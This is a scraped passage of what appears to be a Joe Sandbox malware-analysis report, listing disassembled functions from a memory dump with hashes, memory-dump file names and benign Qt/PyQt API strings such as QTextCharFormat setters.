                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$Item@@$?column?insertColumn@Count@Item@@@@@List@
                                                                                                                                                                                                                                          • String ID: BJ3$QStandardItem$appendColumn$appendColumn(self, items: Iterable[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 777265572-158524329
                                                                                                                                                                                                                                          • Opcode ID: b18bc6e56fcfe81e740bf3d6c3c9bce3759d0dcafe751d70f76175a283bc9387
                                                                                                                                                                                                                                          • Instruction ID: ec0f7ef17b5217696d136333febb3a046cc43d607e97fa59595c07f8a793705d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18bc6e56fcfe81e740bf3d6c3c9bce3759d0dcafe751d70f76175a283bc9387
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5421D336A18B46C1EB20CF15E8891A973A4FB48BD0F954036DA8E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D98FDD0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fontArray@@ByteDeallocFont@@Table@malloc
                                                                                                                                                                                                                                          • String ID: BAA$QRawFont$fontTable$fontTable(self, tagName: Optional[str]) -> QByteArray
                                                                                                                                                                                                                                          • API String ID: 1726220005-2053224348
                                                                                                                                                                                                                                          • Opcode ID: bcc31e09bf7598181bad2e485e24fd008a4a04f0b90e57349ef5f2ab35689a14
                                                                                                                                                                                                                                          • Instruction ID: d5692b8c2f8885fd0c91ca825e839a17f325159b80cb7abddd444db7c4994499
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcc31e09bf7598181bad2e485e24fd008a4a04f0b90e57349ef5f2ab35689a14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18213437A18B42C2EB109F21E8892A933A4FB49FD0F914036DA9E07320EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D961A90 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setBottomBorderStyle$setBottomBorderStyle(self, style: QTextFrameFormat.BorderStyle)
                                                                                                                                                                                                                                          • API String ID: 3865857979-749793529
                                                                                                                                                                                                                                          • Opcode ID: 1b3cd66d7d44c6d710f23b1436ef361efe9dc671ebf86cae3c94cc67b7c205af
                                                                                                                                                                                                                                          • Instruction ID: 807bee94f0d580af617d05f9594375b201126fbbc8241b79afc72fa80f1ea896
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b3cd66d7d44c6d710f23b1436ef361efe9dc671ebf86cae3c94cc67b7c205af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21D876A08B4AD1DB208F11E8896A933B5FB48BC4F914132DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D98DF90 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setVerticalAlignment$setVerticalAlignment(self, alignment: QTextCharFormat.VerticalAlignment)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1378512481
                                                                                                                                                                                                                                          • Opcode ID: f44b947a8ce71afce25c5a7436529b457ef969646bae7b1d33942d57e0d5f1b2
                                                                                                                                                                                                                                          • Instruction ID: 609ff2d4c7f6abca00ea437690c61653c6fe0b564c9d992f4423e9decb5a02c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f44b947a8ce71afce25c5a7436529b457ef969646bae7b1d33942d57e0d5f1b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1221D536A08B4AD1DB208F15E8896A933B5FB48BC4F914132DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D985F00 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$setMarker$setMarker(self, marker: QTextBlockFormat.MarkerType)
                                                                                                                                                                                                                                          • API String ID: 3865857979-509391100
                                                                                                                                                                                                                                          • Opcode ID: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                                          • Instruction ID: 6adb6f065db470752b733115d649c9772b40b59b7a3f88ae2ad4dcb201c4c10d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7421D876A08B4A91DB208F11E88969933B5FB88B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D97BEA0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextListFormat$setIndent$setIndent(self, aindent: int)
                                                                                                                                                                                                                                          • API String ID: 3865857979-710005523
                                                                                                                                                                                                                                          • Opcode ID: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                                          • Instruction ID: de113f3a30662097928e30cbb01cd5027739ab103949cb5d7dac2a6923236556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF21D836A08A4AD1DB208F11E8896A933B4FB44B84F914132DA8E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D95DA20 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setTopPadding$setTopPadding(self, padding: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3595128491
                                                                                                                                                                                                                                          • Opcode ID: d3891ad137e822466d355ab0cffaebd5e522a381466b8eb74b7328b3941a8f6b
                                                                                                                                                                                                                                          • Instruction ID: 0128e1a1783803806c2afbe27c7669d75869894cb89dafc69fdfae1e6284bf04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3891ad137e822466d355ab0cffaebd5e522a381466b8eb74b7328b3941a8f6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD210836A08F4AD1DB20CF11E8892A933B4FB48B84F914032DA8E43720EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D993A00 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontLetterSpacing$setFontLetterSpacing(self, spacing: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3956914650
                                                                                                                                                                                                                                          • Opcode ID: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                                          • Instruction ID: 59956cd97f430ddbd10e703a69d5adc66ad297f38fa1bf58f068bf31e6c2abe4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D721C937A08A4AD1DB209F55E8496A933B4FB44BC4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D9740C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
